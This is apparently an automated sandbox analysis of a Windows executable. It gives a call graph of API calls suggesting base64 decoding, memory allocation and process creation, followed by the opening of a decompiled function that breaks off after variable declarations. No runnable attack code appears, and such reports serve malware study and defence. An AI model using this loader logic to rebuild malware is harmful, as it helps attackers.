7ffc123ddfc9 17407->17408 17409 7ffc123dddb8 55 API calls 17408->17409 17414 7ffc123ddfd7 17408->17414 17411 7ffc123ddfd2 17409->17411 17410 7ffc123dbd7c new LeaveCriticalSection 17412 7ffc123ddfe3 17410->17412 17413 7ffc123ddea8 GetStdHandle GetFileType 17411->17413 17412->17342 17413->17414 17414->17410 17417 7ffc123d7de8 17416->17417 17419 7ffc123d7e1c 17416->17419 17418 7ffc123d7e02 FreeLibrary 17417->17418 17417->17419 17418->17417 17419->17347 17421 7ffc123d4022 17420->17421 17424 7ffc123d3f7c __scrt_initialize_onexit_tables __scrt_acquire_startup_lock 17420->17424 17422 7ffc123d4944 __scrt_fastfail 7 API calls 17421->17422 17423 7ffc123d402c 17422->17423 17424->17303 17426 7ffc123d414b 17425->17426 17428 7ffc123d4141 _onexit 17425->17428 17429 7ffc123da6bc 17426->17429 17428->17306 17432 7ffc123da2f8 17429->17432 17439 7ffc123dbd28 EnterCriticalSection 17432->17439 17446 7ffc123db890 17440->17446 17443 7ffc123d6b08 17495 7ffc123d6f4c 17443->17495 17447 7ffc123d3e61 17446->17447 17448 7ffc123db8a1 FlsGetValue 17446->17448 17447->17443 17448->17447 17449 7ffc123db8ae FlsSetValue 17448->17449 17453 7ffc123db730 17449->17453 17454 7ffc123db772 17453->17454 17455 7ffc123db77a 17453->17455 17456 7ffc123da9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17454->17456 17457 7ffc123da9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17455->17457 17456->17455 17458 7ffc123db787 17457->17458 17459 7ffc123da9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17458->17459 17460 7ffc123db794 17459->17460 17461 7ffc123da9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17460->17461 17462 7ffc123db7a1 17461->17462 17463 7ffc123da9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17462->17463 17464 7ffc123db7ae 17463->17464 17465 7ffc123da9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17464->17465 17466 7ffc123db7bb 17465->17466 17467 7ffc123da9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17466->17467 17468 7ffc123db7c8 17467->17468 17469 7ffc123da9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17468->17469 17470 7ffc123db7d5 17469->17470 17471 7ffc123da9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17470->17471 17472 7ffc123db7e5 17471->17472 17473 7ffc123da9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17472->17473 17474 7ffc123db7f5 17473->17474 17479 7ffc123db5e0 17474->17479 17493 7ffc123dbd28 EnterCriticalSection 17479->17493 17496 7ffc123d6f60 17495->17496 17497 7ffc123d3e66 17495->17497 17498 7ffc123d6f6a 17496->17498 17503 7ffc123d7c64 17496->17503 17497->17233 17500 7ffc123d7cb8 __vcrt_FlsSetValue 6 API calls 17498->17500 17501 7ffc123d6f7a 17500->17501 17501->17497 17502 7ffc123da9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17501->17502 17502->17497 17504 7ffc123d79f4 try_get_function 5 API calls 17503->17504 17505 7ffc123d7c8f 17504->17505 17506 7ffc123d7ca5 TlsGetValue 17505->17506 17507 7ffc123d7c97 17505->17507 17506->17507 17507->17498 17515 7ffc123dbd28 EnterCriticalSection 17508->17515 17680 7ffc123d1710 17516->17680 17523 7ffc123d1540 47 API calls 17524 7ffc123e99f7 17523->17524 17525 7ffc123d2970 49 API calls 17524->17525 17526 7ffc123e9a13 17525->17526 17527 7ffc123d1580 49 API calls 17526->17527 17528 7ffc123e9a2a 17527->17528 17529 7ffc123d1540 47 API calls 17528->17529 17530 7ffc123e9a37 17529->17530 17531 7ffc123d2970 49 API calls 17530->17531 17532 7ffc123e9a53 17531->17532 17533 7ffc123d1580 49 API calls 17532->17533 17534 7ffc123e9a6a 17533->17534 17535 7ffc123d1540 47 API calls 17534->17535 17536 7ffc123e9a77 17535->17536 17537 7ffc123d2970 49 API calls 17536->17537 17538 7ffc123e9a93 17537->17538 17539 7ffc123d1580 49 API calls 17538->17539 17540 7ffc123e9aaa 17539->17540 17541 7ffc123d1540 47 API calls 17540->17541 17542 7ffc123e9ab7 17541->17542 17543 7ffc123d2970 49 API calls 17542->17543 17544 7ffc123e9ad3 17543->17544 17545 7ffc123d1580 49 API calls 17544->17545 17546 7ffc123e9aea 17545->17546 17547 7ffc123d1540 47 API calls 17546->17547 17548 7ffc123e9af7 17547->17548 17549 7ffc123d2970 49 API calls 17548->17549 17550 7ffc123e9b13 17549->17550 17551 7ffc123d1580 49 API calls 17550->17551 17552 7ffc123e9b2a 17551->17552 17553 7ffc123d1540 47 API calls 17552->17553 17554 7ffc123e9b37 17553->17554 17555 7ffc123d2970 49 API calls 17554->17555 17556 7ffc123e9b53 17555->17556 17557 7ffc123d1580 49 API calls 17556->17557 17558 7ffc123e9b6a 17557->17558 17559 7ffc123d1540 47 API calls 17558->17559 17560 7ffc123e9b77 17559->17560 17561 7ffc123d2970 49 API calls 17560->17561 17562 7ffc123e9b93 17561->17562 17563 7ffc123d1580 49 API calls 17562->17563 17564 7ffc123e9baa 17563->17564 17565 7ffc123d1540 47 API calls 17564->17565 17566 7ffc123e9bb7 17565->17566 17567 7ffc123d2970 49 API calls 17566->17567 17568 7ffc123e9bd3 17567->17568 17569 7ffc123d1580 49 API calls 17568->17569 17570 7ffc123e9bea 17569->17570 17571 7ffc123d1540 47 API calls 17570->17571 17572 7ffc123e9bf7 17571->17572 17573 7ffc123d2970 49 API calls 17572->17573 17574 7ffc123e9c13 17573->17574 17575 7ffc123d1580 49 API calls 17574->17575 17576 7ffc123e9c2a 17575->17576 17577 7ffc123d1540 47 API calls 17576->17577 17578 7ffc123e9c37 17577->17578 17579 7ffc123d2970 49 API calls 17578->17579 17580 7ffc123e9c53 17579->17580 17581 7ffc123d1580 49 API calls 17580->17581 17582 7ffc123e9c6a 17581->17582 17583 7ffc123d1540 47 API calls 17582->17583 17584 7ffc123e9c77 17583->17584 17585 7ffc123d2970 49 API calls 17584->17585 17586 7ffc123e9c93 17585->17586 17587 7ffc123d1580 49 API calls 17586->17587 17588 7ffc123e9cb0 17587->17588 17589 7ffc123d1540 47 API calls 17588->17589 17590 7ffc123e9cbd 17589->17590 17591 7ffc123d2970 49 API calls 17590->17591 17592 7ffc123e9cd9 17591->17592 17593 7ffc123d1580 49 API calls 17592->17593 17594 7ffc123e9cf6 17593->17594 17595 7ffc123d1540 47 API calls 17594->17595 17596 7ffc123e9d03 17595->17596 17597 7ffc123d2970 49 API calls 17596->17597 17598 7ffc123e9d1f 17597->17598 17599 7ffc123d1580 49 API calls 17598->17599 17600 7ffc123e9d3c 17599->17600 17601 7ffc123d1540 47 API calls 17600->17601 17602 7ffc123e9d49 17601->17602 17603 7ffc123d2970 49 API calls 17602->17603 17604 7ffc123e9d65 17603->17604 17605 7ffc123d1580 49 API calls 17604->17605 17606 7ffc123e9d82 17605->17606 17607 7ffc123d1540 47 API calls 17606->17607 17608 7ffc123e9d8f 17607->17608 17609 7ffc123d2970 49 API calls 17608->17609 17610 7ffc123e9dab 17609->17610 17611 7ffc123d1580 49 API calls 17610->17611 17612 7ffc123e9dc8 17611->17612 17613 7ffc123d1540 47 API calls 17612->17613 17614 7ffc123e9dd5 17613->17614 17615 7ffc123d2970 49 API calls 17614->17615 17616 7ffc123e9df1 17615->17616 17617 7ffc123d1580 49 API calls 17616->17617 17618 7ffc123e9e0e 17617->17618 17619 7ffc123d1540 47 API calls 17618->17619 17620 7ffc123e9e1b 17619->17620 17621 7ffc123d2970 49 API calls 17620->17621 17622 7ffc123e9e37 17621->17622 17623 7ffc123d1580 49 API calls 17622->17623 17624 7ffc123e9e54 17623->17624 17625 7ffc123d1540 47 API calls 17624->17625 17626 7ffc123e9e61 17625->17626 17627 7ffc123d2970 49 API calls 17626->17627 17628 7ffc123e9e7d 17627->17628 17629 7ffc123d1580 49 API calls 17628->17629 17630 7ffc123e9e9a 17629->17630 17631 7ffc123d1540 47 API calls 17630->17631 17632 7ffc123e9ea7 17631->17632 17710 7ffc123d16a0 17632->17710 17635 7ffc123d1540 47 API calls 17636 7ffc123e9ed4 17635->17636 17637 7ffc123d3a70 _UnwindNestedFrames 8 API calls 17636->17637 17638 7ffc123e9eec 17637->17638 17638->17265 17640 7ffc123e9437 CryptStringToBinaryA 17639->17640 17641 7ffc123e9239 17639->17641 17640->17641 17642 7ffc123e9476 new 17640->17642 17644 7ffc123d1540 17641->17644 17642->17641 17643 7ffc123e94b9 CryptStringToBinaryA 17642->17643 17643->17641 17645 7ffc123d1910 type_info::_name_internal_method 47 API calls 17644->17645 17646 7ffc123d1561 Concurrency::details::WorkQueue::IsStructuredEmpty 17645->17646 17646->17271 17954 7ffc123d91b8 17647->17954 17650 7ffc123d91b8 47 API calls 17651 7ffc123e954e 17650->17651 17652 7ffc123d91b8 47 API calls 17651->17652 17653 7ffc123e955e VirtualAlloc 17652->17653 17654 7ffc123e93bd 17653->17654 17654->17283 17983 7ffc123e9f40 17655->17983 17657 7ffc123e9f11 17658 7ffc123e9f24 ExitProcess 17657->17658 17659 7ffc123e928c CoInitialize 17657->17659 17659->17279 17659->17280 17660->17284 17662 7ffc123e3d53 RegisterTouchWindow 17661->17662 17669 7ffc123e3d4c 17661->17669 17663 7ffc123e3d64 MessageBoxW 17662->17663 17664 7ffc123e3d87 17662->17664 17663->17669 17665 7ffc123e3d93 CoCreateInstance 17664->17665 17666 7ffc123e3dc6 17665->17666 17665->17669 18007 7ffc123d3d6c 17666->18007 17668 7ffc123e3dd0 17668->17669 17670 7ffc123e3e9b ShowWindow UpdateWindow 17668->17670 17669->17287 17669->17288 17670->17669 17672 7ffc123d3a7a 17671->17672 17673 7ffc123d3a86 17672->17673 17674 7ffc123d3b04 IsProcessorFeaturePresent 17672->17674 17673->17217 17673->17219 17675 7ffc123d3b1b 17674->17675 18021 7ffc123d3cf8 RtlCaptureContext 17675->18021 17681 7ffc123d1731 17680->17681 17716 7ffc123d1910 17681->17716 17683 7ffc123d1741 17720 7ffc123d1b10 17683->17720 17686 7ffc123d2970 17882 7ffc123d1760 17686->17882 17688 7ffc123d29ad char_traits 17886 7ffc123d2cc0 17688->17886 17690 7ffc123d29e2 17890 7ffc123d2e90 17690->17890 17695 7ffc123d16a0 47 API calls 17696 7ffc123d2a12 17695->17696 17697 7ffc123d1540 47 API calls 17696->17697 17698 7ffc123d2a27 17697->17698 17699 7ffc123d3a70 _UnwindNestedFrames 8 API calls 17698->17699 17700 7ffc123d2a39 17699->17700 17701 7ffc123d1580 17700->17701 17702 7ffc123d15a7 17701->17702 17703 7ffc123d1677 17701->17703 17704 7ffc123d1910 type_info::_name_internal_method 47 API calls 17702->17704 17703->17523 17705 7ffc123d15b6 Concurrency::details::WorkQueue::IsStructuredEmpty Concurrency::details::HardwareAffinity::operator!= 17704->17705 17706 7ffc123d167a 17705->17706 17708 7ffc123d163d 17705->17708 17923 7ffc123d1f00 17706->17923 17919 7ffc123d2a90 17708->17919 17711 7ffc123d16c1 Concurrency::details::WorkQueue::IsStructuredEmpty shared_ptr 17710->17711 17712 7ffc123d1910 type_info::_name_internal_method 47 API calls 17711->17712 17713 7ffc123d16e8 17712->17713 17714 7ffc123d1f00 47 API calls 17713->17714 17715 7ffc123d1701 17714->17715 17715->17635 17717 7ffc123d192b type_info::_name_internal_method 17716->17717 17718 7ffc123d1930 Concurrency::details::WorkQueue::IsStructuredEmpty Concurrency::details::ContextBase::GetWorkQueueIdentity type_info::_name_internal_method char_traits 17716->17718 17717->17683 17718->17717 17724 7ffc123d2100 17718->17724 17721 7ffc123d1b28 char_traits 17720->17721 17792 7ffc123d1b40 17721->17792 17723 7ffc123d1750 17723->17686 17727 7ffc123d2880 17724->17727 17730 7ffc123d13a0 17727->17730 17729 7ffc123d2127 17729->17717 17731 7ffc123d13c8 17730->17731 17732 7ffc123d13cd 17730->17732 17742 7ffc123d9764 17731->17742 17734 7ffc123d9764 _invalid_parameter_noinfo_noreturn 47 API calls 17732->17734 17736 7ffc123d1409 17732->17736 17740 7ffc123d146b 17732->17740 17734->17736 17735 7ffc123d1435 17738 7ffc123d1450 17735->17738 17739 7ffc123d9764 _invalid_parameter_noinfo_noreturn 47 API calls 17735->17739 17736->17735 17737 7ffc123d9764 _invalid_parameter_noinfo_noreturn 47 API calls 17736->17737 17737->17735 17738->17740 17741 7ffc123d9764 _invalid_parameter_noinfo_noreturn 47 API calls 17738->17741 17739->17738 17740->17729 17741->17740 17747 7ffc123d95d8 17742->17747 17748 7ffc123d9603 17747->17748 17759 7ffc123d9674 17748->17759 17750 7ffc123d962a 17753 7ffc123d964d 17750->17753 17769 7ffc123d90d0 17750->17769 17752 7ffc123d9662 17755 7ffc123d9794 IsProcessorFeaturePresent 17752->17755 17753->17752 17754 7ffc123d90d0 _invalid_parameter_noinfo_noreturn 47 API calls 17753->17754 17754->17752 17756 7ffc123d97a7 17755->17756 17784 7ffc123d9474 17756->17784 17760 7ffc123d93bc _invalid_parameter_noinfo_noreturn 18 API calls 17759->17760 17761 7ffc123d969e 17760->17761 17762 7ffc123d9428 _invalid_parameter_noinfo_noreturn GetLastError SetLastError 17761->17762 17763 7ffc123d96af 17761->17763 17764 7ffc123d96fb 17762->17764 17763->17750 17764->17763 17765 7ffc123d9794 _invalid_parameter_noinfo_noreturn 17 API calls 17764->17765 17766 7ffc123d9742 17765->17766 17767 7ffc123d95d8 _invalid_parameter_noinfo_noreturn 47 API calls 17766->17767 17768 7ffc123d975d 17767->17768 17768->17750 17770 7ffc123d9128 17769->17770 17771 7ffc123d90df GetLastError 17769->17771 17770->17753 17772 7ffc123d90f4 17771->17772 17773 7ffc123dbb14 _invalid_parameter_noinfo_noreturn 16 API calls 17772->17773 17774 7ffc123d910e SetLastError 17773->17774 17774->17770 17775 7ffc123d9131 17774->17775 17776 7ffc123daa78 ExFilterRethrow 45 API calls 17775->17776 17777 7ffc123d9136 17776->17777 17778 7ffc123d90d0 _invalid_parameter_noinfo_noreturn 45 API calls 17777->17778 17779 7ffc123d9157 17778->17779 17780 7ffc123db474 _invalid_parameter_noinfo_noreturn 45 API calls 17779->17780 17781 7ffc123d917f 17780->17781 17782 7ffc123db4e0 _invalid_parameter_noinfo_noreturn 45 API calls 17781->17782 17783 7ffc123d918f 17782->17783 17783->17753 17785 7ffc123d94ae __scrt_fastfail _invalid_parameter_noinfo_noreturn 17784->17785 17786 7ffc123d94d6 RtlCaptureContext RtlLookupFunctionEntry 17785->17786 17787 7ffc123d9546 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17786->17787 17788 7ffc123d9510 RtlVirtualUnwind 17786->17788 17789 7ffc123d9598 _invalid_parameter_noinfo_noreturn 17787->17789 17788->17787 17790 7ffc123d3a70 _UnwindNestedFrames 8 API calls 17789->17790 17791 7ffc123d95b7 GetCurrentProcess TerminateProcess 17790->17791 17793 7ffc123d1b62 type_info::_name_internal_method 17792->17793 17794 7ffc123d1b69 Concurrency::details::ContextBase::GetWorkQueueIdentity 17793->17794 17795 7ffc123d1b97 17793->17795 17808 7ffc123d1bf0 17794->17808 17799 7ffc123d22b0 17795->17799 17798 7ffc123d1b95 Concurrency::details::ContextBase::GetWorkQueueIdentity type_info::_name_internal_method char_traits 17798->17723 17800 7ffc123d22cd type_info::_name_internal_method 17799->17800 17802 7ffc123d22de type_info::_name_internal_method 17800->17802 17824 7ffc123d2230 17800->17824 17803 7ffc123d22f2 type_info::_name_internal_method 17802->17803 17806 7ffc123d2310 type_info::_name_internal_method 17802->17806 17818 7ffc123d2600 17803->17818 17805 7ffc123d230e type_info::_name_internal_method 17805->17798 17806->17805 17807 7ffc123d1910 type_info::_name_internal_method 47 API calls 17806->17807 17807->17805 17861 7ffc123d21f0 17808->17861 17810 7ffc123d1c17 type_info::_name_internal_method 17811 7ffc123d1c6c 17810->17811 17812 7ffc123d1c3c 17810->17812 17813 7ffc123d22b0 type_info::_name_internal_method 49 API calls 17811->17813 17865 7ffc123d2520 17812->17865 17817 7ffc123d1c6a Concurrency::details::ContextBase::GetWorkQueueIdentity type_info::_name_internal_method char_traits 17813->17817 17815 7ffc123d1c59 17868 7ffc123d2450 17815->17868 17817->17798 17821 7ffc123d2640 Concurrency::details::WorkQueue::IsStructuredEmpty type_info::_name_internal_method 17818->17821 17820 7ffc123d1910 type_info::_name_internal_method 47 API calls 17823 7ffc123d27c2 Concurrency::details::WorkQueue::IsStructuredEmpty construct type_info::_name_internal_method 17820->17823 17827 7ffc123d28e0 17821->17827 17822 7ffc123d2760 Concurrency::details::ContextBase::GetWorkQueueIdentity char_traits 17822->17820 17823->17805 17844 7ffc123d4e9c 17824->17844 17830 7ffc123d2930 17827->17830 17833 7ffc123d12b0 17830->17833 17834 7ffc123d12de 17833->17834 17843 7ffc123d12d4 17833->17843 17835 7ffc123d4e7c Concurrency::cancel_current_task RtlPcToFileHeader RaiseException 17834->17835 17836 7ffc123d12f8 17834->17836 17835->17836 17837 7ffc123d137c 17836->17837 17839 7ffc123d131c 17836->17839 17838 7ffc123d3d6c new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 17837->17838 17838->17843 17840 7ffc123d133b 17839->17840 17841 7ffc123d4e7c Concurrency::cancel_current_task RtlPcToFileHeader RaiseException 17839->17841 17842 7ffc123d3d6c new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 17840->17842 17841->17840 17842->17843 17843->17822 17849 7ffc123d4c70 17844->17849 17848 7ffc123d4ebe 17857 7ffc123d6d48 17849->17857 17851 7ffc123d4ca7 17852 7ffc123d6e00 17851->17852 17853 7ffc123d6e4c 17852->17853 17854 7ffc123d6e6e RtlPcToFileHeader 17852->17854 17853->17854 17855 7ffc123d6e93 17854->17855 17856 7ffc123d6eae RaiseException 17854->17856 17855->17856 17856->17848 17858 7ffc123d6d9e __std_exception_destroy 17857->17858 17859 7ffc123d6d69 new 17857->17859 17858->17851 17859->17858 17860 7ffc123da97c __std_exception_copy 47 API calls 17859->17860 17860->17858 17862 7ffc123d2208 type_info::_name_internal_method 17861->17862 17863 7ffc123d221c 17862->17863 17871 7ffc123d25e0 17862->17871 17863->17810 17866 7ffc123d21f0 type_info::_name_internal_method 49 API calls 17865->17866 17867 7ffc123d253d type_info::_name_internal_method 17866->17867 17867->17815 17869 7ffc123d21f0 type_info::_name_internal_method 49 API calls 17868->17869 17870 7ffc123d2472 Concurrency::details::ContextBase::GetWorkQueueIdentity type_info::_name_internal_method char_traits 17869->17870 17870->17817 17874 7ffc123d4ec0 17871->17874 17879 7ffc123d4d3c 17874->17879 17877 7ffc123d6e00 _CxxThrowException 2 API calls 17878 7ffc123d4ee2 17877->17878 17880 7ffc123d6d48 __std_exception_copy 47 API calls 17879->17880 17881 7ffc123d4d73 17880->17881 17881->17877 17883 7ffc123d177c 17882->17883 17884 7ffc123d1910 type_info::_name_internal_method 47 API calls 17883->17884 17885 7ffc123d178c 17884->17885 17885->17688 17887 7ffc123d2cd8 type_info::_name_internal_method 17886->17887 17888 7ffc123d22b0 type_info::_name_internal_method 49 API calls 17887->17888 17889 7ffc123d2d1a type_info::_name_internal_method 17887->17889 17888->17889 17889->17690 17896 7ffc123d1510 17890->17896 17893 7ffc123d2e60 17906 7ffc123d14e0 17893->17906 17899 7ffc123d1df0 17896->17899 17898 7ffc123d1537 17898->17893 17900 7ffc123d21f0 type_info::_name_internal_method 49 API calls 17899->17900 17901 7ffc123d1e17 type_info::_name_internal_method 17900->17901 17902 7ffc123d2230 _Mtx_guard::~_Mtx_guard 49 API calls 17901->17902 17903 7ffc123d1e5b type_info::_name_internal_method 17901->17903 17902->17903 17904 7ffc123d22b0 type_info::_name_internal_method 49 API calls 17903->17904 17905 7ffc123d1e8c Concurrency::details::ContextBase::GetWorkQueueIdentity type_info::_name_internal_method char_traits 17903->17905 17904->17905 17905->17898 17907 7ffc123d14f8 char_traits 17906->17907 17910 7ffc123d1ce0 17907->17910 17909 7ffc123d150a 17909->17695 17911 7ffc123d1d02 type_info::_name_internal_method 17910->17911 17912 7ffc123d1d09 Concurrency::details::ContextBase::GetWorkQueueIdentity 17911->17912 17913 7ffc123d1d3a type_info::_name_internal_method 17911->17913 17914 7ffc123d1df0 type_info::_name_internal_method 49 API calls 17912->17914 17915 7ffc123d2230 _Mtx_guard::~_Mtx_guard 49 API calls 17913->17915 17916 7ffc123d1d65 type_info::_name_internal_method 17913->17916 17918 7ffc123d1d35 Concurrency::details::ContextBase::GetWorkQueueIdentity type_info::_name_internal_method char_traits 17914->17918 17915->17916 17917 7ffc123d22b0 type_info::_name_internal_method 49 API calls 17916->17917 17916->17918 17917->17918 17918->17909 17920 7ffc123d2ab2 17919->17920 17927 7ffc123d2d40 17920->17927 17924 7ffc123d1f18 Concurrency::details::WorkQueue::IsStructuredEmpty construct type_info::_name_internal_method char_traits 17923->17924 17925 7ffc123d1910 type_info::_name_internal_method 47 API calls 17924->17925 17926 7ffc123d2016 17925->17926 17926->17703 17928 7ffc123d2d6d 17927->17928 17929 7ffc123d2dc1 type_info::_name_internal_method 17928->17929 17930 7ffc123d2d74 type_info::_name_internal_method 17928->17930 17934 7ffc123d2fc0 17929->17934 17931 7ffc123d2450 49 API calls 17930->17931 17932 7ffc123d2af4 17931->17932 17932->17703 17935 7ffc123d2fea type_info::_name_internal_method 17934->17935 17936 7ffc123d2ff1 Concurrency::details::ContextBase::GetWorkQueueIdentity 17935->17936 17937 7ffc123d303c 17935->17937 17945 7ffc123d3240 17936->17945 17938 7ffc123d21f0 type_info::_name_internal_method 49 API calls 17937->17938 17940 7ffc123d304b type_info::_name_internal_method 17938->17940 17941 7ffc123d2230 _Mtx_guard::~_Mtx_guard 49 API calls 17940->17941 17942 7ffc123d30aa Concurrency::details::ContextBase::GetWorkQueueIdentity type_info::_name_internal_method char_traits 17940->17942 17941->17942 17943 7ffc123d22b0 type_info::_name_internal_method 49 API calls 17942->17943 17944 7ffc123d3037 Concurrency::details::ContextBase::GetWorkQueueIdentity type_info::_name_internal_method char_traits 17942->17944 17943->17944 17944->17932 17946 7ffc123d21f0 type_info::_name_internal_method 49 API calls 17945->17946 17947 7ffc123d3270 17946->17947 17948 7ffc123d21f0 type_info::_name_internal_method 49 API calls 17947->17948 17949 7ffc123d3285 type_info::_name_internal_method 17948->17949 17950 7ffc123d2230 _Mtx_guard::~_Mtx_guard 49 API calls 17949->17950 17951 7ffc123d3315 type_info::_name_internal_method 17949->17951 17950->17951 17952 7ffc123d22b0 type_info::_name_internal_method 49 API calls 17951->17952 17953 7ffc123d338e Concurrency::details::ContextBase::GetWorkQueueIdentity type_info::_name_internal_method char_traits 17951->17953 17952->17953 17953->17944 17955 7ffc123d91e8 17954->17955 17962 7ffc123d893c 17955->17962 17958 7ffc123d923c 17960 7ffc123d9251 17958->17960 17961 7ffc123d90d0 _invalid_parameter_noinfo_noreturn 47 API calls 17958->17961 17959 7ffc123d90d0 _invalid_parameter_noinfo_noreturn 47 API calls 17959->17958 17960->17650 17961->17960 17963 7ffc123d8947 17962->17963 17964 7ffc123d8975 17963->17964 17965 7ffc123d8987 17963->17965 17966 7ffc123db420 _set_errno_from_matherr 11 API calls 17964->17966 17968 7ffc123d8995 17965->17968 17972 7ffc123d89d1 17965->17972 17967 7ffc123d897a 17966->17967 17980 7ffc123d9744 17967->17980 17970 7ffc123d9674 _invalid_parameter_noinfo_noreturn 47 API calls 17968->17970 17975 7ffc123d8985 17968->17975 17970->17975 17971 7ffc123d8d5d 17973 7ffc123db420 _set_errno_from_matherr 11 API calls 17971->17973 17971->17975 17972->17971 17974 7ffc123db420 _set_errno_from_matherr 11 API calls 17972->17974 17976 7ffc123d8ffd 17973->17976 17977 7ffc123d8d52 17974->17977 17975->17958 17975->17959 17978 7ffc123d9744 _invalid_parameter_noinfo 47 API calls 17976->17978 17979 7ffc123d9744 _invalid_parameter_noinfo 47 API calls 17977->17979 17978->17975 17979->17971 17981 7ffc123d95d8 _invalid_parameter_noinfo_noreturn 47 API calls 17980->17981 17982 7ffc123d975d 17981->17982 17982->17975 17986 7ffc123ea250 17983->17986 17985 7ffc123e9f51 17985->17657 17989 7ffc123eacc0 17986->17989 17988 7ffc123ea261 17988->17985 17992 7ffc123eb560 17989->17992 17991 7ffc123eacd1 17991->17988 17995 7ffc123ebc70 17992->17995 17994 7ffc123eb571 17994->17991 17998 7ffc123ec580 17995->17998 17997 7ffc123ebc81 17997->17994 18001 7ffc123ecf10 17998->18001 18000 7ffc123ec591 18000->17997 18004 7ffc123ed890 18001->18004 18003 7ffc123ecf21 18003->18000 18005 7ffc123ee020 8 API calls 18004->18005 18006 7ffc123ed8a1 18005->18006 18006->18003 18010 7ffc123d3d77 new 18007->18010 18008 7ffc123d3da2 18008->17668 18009 7ffc123d97ec new 2 API calls 18009->18010 18010->18008 18010->18009 18013 7ffc123d472c 18010->18013 18017 7ffc123d470c 18010->18017 18014 7ffc123d473a std::bad_alloc::bad_alloc 18013->18014 18015 7ffc123d6e00 _CxxThrowException 2 API calls 18014->18015 18016 7ffc123d474b 18015->18016 18016->18010 18018 7ffc123d471a std::bad_alloc::bad_alloc 18017->18018 18019 7ffc123d6e00 _CxxThrowException 2 API calls 18018->18019 18020 7ffc123d472b 18019->18020 18022 7ffc123d3d12 RtlLookupFunctionEntry 18021->18022 18023 7ffc123d3d28 RtlVirtualUnwind 18022->18023 18024 7ffc123d3b2e 18022->18024 18023->18022 18023->18024 18025 7ffc123d3ad0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 18024->18025 18026 7ffc123e3f70 18029 7ffc123e9600 18026->18029 18028 7ffc123e3f97 ExitProcess 18030 7ffc123e9758 18029->18030 18030->18028 18031 18000741c 18032 18000745d 18031->18032 18035 1800284b0 18032->18035 18034 1800075fe 18037 180028554 18035->18037 18036 180028653 CreateProcessW 18036->18034 18037->18036

                                                                                                        Control-flow Graph

                                                                                                        C-Code - Quality: 25%
                                                                                                        			E00007FFC7FFC123E3FB0(intOrPtr __edx, void* __edi, void* __esp, void* __rbx, long long __rcx, void* __rdx, void* __rdi, void* __rsi, long long __r8, long long _a8, intOrPtr _a16, long long _a24) {
                                                                                                        				signed int _v24;
                                                                                                        				char _v29;
                                                                                                        				char _v30;
                                                                                                        				char _v31;
                                                                                                        				char _v32;
                                                                                                        				char _v33;
                                                                                                        				char _v34;
                                                                                                        				char _v35;
                                                                                                        				char _v36;
                                                                                                        				char _v37;
                                                                                                        				char _v38;
                                                                                                        				char _v39;
                                                                                                        				char _v40;
                                                                                                        				char _v41;
                                                                                                        				char _v42;
                                                                                                        				char _v43;
                                                                                                        				char _v44;
                                                                                                        				char _v45;
                                                                                                        				char _v46;
                                                                                                        				char _v47;
                                                                                                        				char _v48;
                                                                                                        				char _v49;
                                                                                                        				char _v50;
                                                                                                        				char _v51;
                                                                                                        				char _v52;
                                                                                                        				char _v53;
                                                                                                        				char _v54;
                                                                                                        				char _v55;
                                                                                                        				char _v56;
                                                                                                        				char _v57;
                                                                                                        				char _v58;
                                                                                                        				char _v59;
                                                                                                        				char _v60;
                                                                                                        				char _v61;
                                                                                                        				char _v62;
                                                                                                        				char _v63;
                                                                                                        				char _v64;
                                                                                                        				char _v65;
                                                                                                        				char _v66;
                                                                                                        				char _v67;
                                                                                                        				char _v68;
                                                                                                        				char _v69;
                                                                                                        				char _v70;
                                                                                                        				char _v71;
                                                                                                        				char _v72;
                                                                                                        				char _v73;
                                                                                                        				char _v74;
                                                                                                        				char _v75;
                                                                                                        				char _v76;
                                                                                                        				char _v77;
                                                                                                        				char _v78;
                                                                                                        				char _v79;
                                                                                                        				char _v80;
                                                                                                        				char _v81;
                                                                                                        				char _v82;
                                                                                                        				char _v83;
                                                                                                        				char _v84;
                                                                                                        				char _v85;
                                                                                                        				char _v86;
                                                                                                        				char _v87;
                                                                                                        				char _v88;
                                                                                                        				char _v89;
                                                                                                        				char _v90;
                                                                                                        				char _v91;
                                                                                                        				char _v92;
                                                                                                        				char _v93;
                                                                                                        				char _v94;
                                                                                                        				char _v95;
                                                                                                        				char _v96;
                                                                                                        				char _v97;
                                                                                                        				char _v98;
                                                                                                        				char _v99;
                                                                                                        				char _v100;
                                                                                                        				char _v101;
                                                                                                        				char _v102;
                                                                                                        				char _v103;
                                                                                                        				char _v104;
                                                                                                        				char _v105;
                                                                                                        				char _v106;
                                                                                                        				char _v107;
                                                                                                        				char _v108;
                                                                                                        				char _v109;
                                                                                                        				char _v110;
                                                                                                        				char _v111;
                                                                                                        				char _v112;
                                                                                                        				char _v113;
                                                                                                        				char _v114;
                                                                                                        				char _v115;
                                                                                                        				char _v116;
                                                                                                        				char _v117;
                                                                                                        				char _v118;
                                                                                                        				char _v119;
                                                                                                        				char _v120;
                                                                                                        				char _v121;
                                                                                                        				char _v122;
                                                                                                        				char _v123;
                                                                                                        				char _v124;
                                                                                                        				char _v125;
                                                                                                        				char _v126;
                                                                                                        				char _v127;
                                                                                                        				char _v128;
                                                                                                        				char _v129;
                                                                                                        				char _v130;
                                                                                                        				char _v131;
                                                                                                        				char _v132;
                                                                                                        				char _v133;
                                                                                                        				char _v134;
                                                                                                        				char _v135;
                                                                                                        				char _v136;
                                                                                                        				char _v137;
                                                                                                        				char _v138;
                                                                                                        				char _v139;
                                                                                                        				char _v140;
                                                                                                        				char _v141;
                                                                                                        				char _v142;
                                                                                                        				char _v143;
                                                                                                        				char _v144;
                                                                                                        				char _v145;
                                                                                                        				char _v146;
                                                                                                        				char _v147;
                                                                                                        				char _v148;
